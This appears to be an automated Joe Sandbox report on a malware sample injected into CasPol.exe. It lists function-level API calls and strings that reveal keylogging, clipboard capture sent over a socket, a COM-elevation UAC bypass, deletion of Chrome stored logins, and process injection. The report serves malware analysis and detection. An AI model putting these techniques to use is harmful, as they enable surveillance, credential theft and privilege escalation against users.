                                                                                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,0000022C), ref: 0040E27A
                                                                                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,0000022C), ref: 0040E2FD
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E30C
                                                                                                                                                                                                                                    • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                                                                                                                                    • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                                                                                                                                    • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,?,?,00474358), ref: 0040E371
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Close$CreateHandleProcess32$FileFirstModuleNameNextSnapshotToolhelp32Value
                                                                                                                                                                                                                                  • String ID: C:\Program Files(x86)\Internet Explorer\$Inj$ieinstal.exe$ielowutil.exe$BG
                                                                                                                                                                                                                                  • API String ID: 726551946-3025026198
                                                                                                                                                                                                                                  • Opcode ID: 595b200ebc38179fa99798b57444edb002c7752eddbd804751fc8e9fe5b1f8b0
                                                                                                                                                                                                                                  • Instruction ID: ae31f71cb8b9f969ca9e83e5ca698076ed3bac053ed440982de07d1dc4d90588
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 595b200ebc38179fa99798b57444edb002c7752eddbd804751fc8e9fe5b1f8b0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED7172311083019BC714FB61D8519EF77A5BF91358F400D3EF986631E2EF38A959CA9A
                                                                                                                                                                                                                                  Function 004159C6 Relevance: 18.1, APIs: 12, Instructions: 80clipboardmemoryCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenClipboard.USER32 ref: 004159C7
                                                                                                                                                                                                                                  • EmptyClipboard.USER32 ref: 004159D5
                                                                                                                                                                                                                                  • GlobalAlloc.KERNEL32(00002000,-00000002), ref: 004159F5
                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 004159FE
                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00415A34
                                                                                                                                                                                                                                  • SetClipboardData.USER32(0000000D,00000000), ref: 00415A3D
                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00415A5A
                                                                                                                                                                                                                                  • OpenClipboard.USER32 ref: 00415A61
                                                                                                                                                                                                                                  • GetClipboardData.USER32(0000000D), ref: 00415A71
                                                                                                                                                                                                                                  • GlobalLock.KERNEL32(00000000), ref: 00415A7A
                                                                                                                                                                                                                                  • GlobalUnlock.KERNEL32(00000000), ref: 00415A83
                                                                                                                                                                                                                                  • CloseClipboard.USER32 ref: 00415A89
                                                                                                                                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Clipboard$Global$CloseDataLockOpenUnlock$AllocEmptysend
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3520204547-0
                                                                                                                                                                                                                                  • Opcode ID: c2e940ea863fb9686de185adfd037cf3e930d987ca06f45f9b4980846c20bf7d
                                                                                                                                                                                                                                  • Instruction ID: b8e523df9fc7c7245f85f50a48877f09888e29e8b5459684195c928b546a98bf
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c2e940ea863fb9686de185adfd037cf3e930d987ca06f45f9b4980846c20bf7d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E02183712043009BC714BBB1EC5AAAE76A9AF80752F00453EFD06961E2EF38C845D66A
                                                                                                                                                                                                                                  Function 00418754 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: 0$1$2$3$4$5$6$7
                                                                                                                                                                                                                                  • API String ID: 0-3177665633
                                                                                                                                                                                                                                  • Opcode ID: 9b02e51a1cc6672d7d2f4342b27c01cb84a2fdb077451789e1e817f40a25d538
                                                                                                                                                                                                                                  • Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9b02e51a1cc6672d7d2f4342b27c01cb84a2fdb077451789e1e817f40a25d538
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797
                                                                                                                                                                                                                                  Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetForegroundWindow.USER32 ref: 00409B3F
                                                                                                                                                                                                                                  • GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
                                                                                                                                                                                                                                  • GetKeyboardLayout.USER32(00000000), ref: 00409B52
                                                                                                                                                                                                                                  • GetKeyState.USER32(00000010), ref: 00409B5C
                                                                                                                                                                                                                                  • GetKeyboardState.USER32(?), ref: 00409B67
                                                                                                                                                                                                                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
                                                                                                                                                                                                                                  • ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
                                                                                                                                                                                                                                  • ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
                                                                                                                                                                                                                                  • String ID: 8[G
                                                                                                                                                                                                                                  • API String ID: 1888522110-1691237782
                                                                                                                                                                                                                                  • Opcode ID: 3e4cd20e139c82d1a9a354c0cd804b45f3e7cb2135d7d20bc0d0fffe1111d1b9
                                                                                                                                                                                                                                  • Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3e4cd20e139c82d1a9a354c0cd804b45f3e7cb2135d7d20bc0d0fffe1111d1b9
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96
                                                                                                                                                                                                                                  Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • _wcslen.LIBCMT ref: 00406788
                                                                                                                                                                                                                                  • CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Object_wcslen
                                                                                                                                                                                                                                  • String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
                                                                                                                                                                                                                                  • API String ID: 240030777-3166923314
                                                                                                                                                                                                                                  • Opcode ID: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                                                                                                                                                  • Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f680b05b7da9254b8b2e62aef58334289a0f3b659c75efd963e3361adaa2c028
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D
                                                                                                                                                                                                                                  Function 004198C2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
                                                                                                                                                                                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00419935
                                                                                                                                                                                                                                  • EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: EnumServicesStatus$ErrorLastManagerOpen
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 3587775597-0
                                                                                                                                                                                                                                  • Opcode ID: aa171504a469903125c5aced0f136fa6d8287bc29fc722de82985c10da00967e
                                                                                                                                                                                                                                  • Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: aa171504a469903125c5aced0f136fa6d8287bc29fc722de82985c10da00967e
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A
                                                                                                                                                                                                                                  Function 004513B7 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
                                                                                                                                                                                                                                    • Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                                                                                                                                                                                  • GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
                                                                                                                                                                                                                                  • IsValidCodePage.KERNEL32(00000000), ref: 0045151E
                                                                                                                                                                                                                                  • IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
                                                                                                                                                                                                                                  • GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
                                                                                                                                                                                                                                  • String ID: <D$<D$<D
                                                                                                                                                                                                                                  • API String ID: 745075371-3495170934
                                                                                                                                                                                                                                  • Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                                                                                                                  • Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769
                                                                                                                                                                                                                                  Function 004099E4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65windowCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
                                                                                                                                                                                                                                  • SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00409A1B
                                                                                                                                                                                                                                    • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                  • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
                                                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 00409A7A
                                                                                                                                                                                                                                  • DispatchMessageA.USER32(?), ref: 00409A85
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
                                                                                                                                                                                                                                  • String ID: Keylogger initialization failure: error $`Wu
                                                                                                                                                                                                                                  • API String ID: 3219506041-303027793
                                                                                                                                                                                                                                  • Opcode ID: 25a0a320df1ddd4a05f1bf56172276946895212d30ef73ac9bcc580e9fe83ffd
                                                                                                                                                                                                                                  • Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 25a0a320df1ddd4a05f1bf56172276946895212d30ef73ac9bcc580e9fe83ffd
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB
                                                                                                                                                                                                                                  Function 0041B42F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B489
                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B4BB
                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B529
                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B536
                                                                                                                                                                                                                                    • Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B50C
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B561
                                                                                                                                                                                                                                  • RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B568
                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,004742E0,004742F8), ref: 0041B570
                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000,?,?,?,?,?,?,004742E0,004742F8), ref: 0041B583
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 2341273852-0
                                                                                                                                                                                                                                  • Opcode ID: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                                                                                                                                                  • Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e3c00313fe9feb441b7390d1c72d337a5a5a4ab260ce0f05f37d8840b2d05d0a
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69
                                                                                                                                                                                                                                  Function 00418C69 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
                                                                                                                                                                                                                                  • FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B
                                                                                                                                                                                                                                    • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: File$Find$CreateFirstNext
                                                                                                                                                                                                                                  • String ID: @CG$XCG$`HG$`HG$>G
                                                                                                                                                                                                                                  • API String ID: 341183262-3780268858
                                                                                                                                                                                                                                  • Opcode ID: e25210a9d7b7e82b6a9b82c31aad92ae6b60801589120e6a5d82eb0f0d8b2074
                                                                                                                                                                                                                                  • Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: e25210a9d7b7e82b6a9b82c31aad92ae6b60801589120e6a5d82eb0f0d8b2074
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A
                                                                                                                                                                                                                                  Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 0041301A
                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 00413026
                                                                                                                                                                                                                                    • Part of subcall function 00404468: send.WS2_32(000002C8,00000000,00000000,00000000), ref: 004044FD
                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 004131F4
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: AddressCloseCreateLibraryLoadProcsend
                                                                                                                                                                                                                                  • String ID: SHDeleteKeyW$Shlwapi.dll
                                                                                                                                                                                                                                  • API String ID: 2127411465-314212984
                                                                                                                                                                                                                                  • Opcode ID: 616d211cfd713e5ab2c6ae92bfb1af761b1a64123242e1c70261f538c41569eb
                                                                                                                                                                                                                                  • Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 616d211cfd713e5ab2c6ae92bfb1af761b1a64123242e1c70261f538c41569eb
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB
                                                                                                                                                                                                                                  Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0040B261
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222
                                                                                                                                                                                                                                  • [Chrome StoredLogins not found], xrefs: 0040B27B
                                                                                                                                                                                                                                  • [Chrome StoredLogins found, cleared!], xrefs: 0040B287
                                                                                                                                                                                                                                  • UserProfile, xrefs: 0040B227
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000C.00000002.3857869993.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000473000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 0000000C.00000002.3857869993.0000000000476000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_12_2_400000_CasPol.jbxd
                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                                                                                                                                                                                                                  • API String ID: 2018770650-1062637481
                                                                                                                                                                                                                                  • Opcode ID: bdddc7e9eb557f5a320f3d6e825e671367b569a08c7a941355f568ef02c6412d
                                                                                                                                                                                                                                  • Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdddc7e9eb557f5a320f3d6e825e671367b569a08c7a941355f568ef02c6412d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE
                                                                                                                                                                                                                                  Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON
                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
                                                                                                                                                                                                                                  • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
                                                                                                                                                                                                                                  • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00416B02
                                                                                                                                                                                                                                  Strings
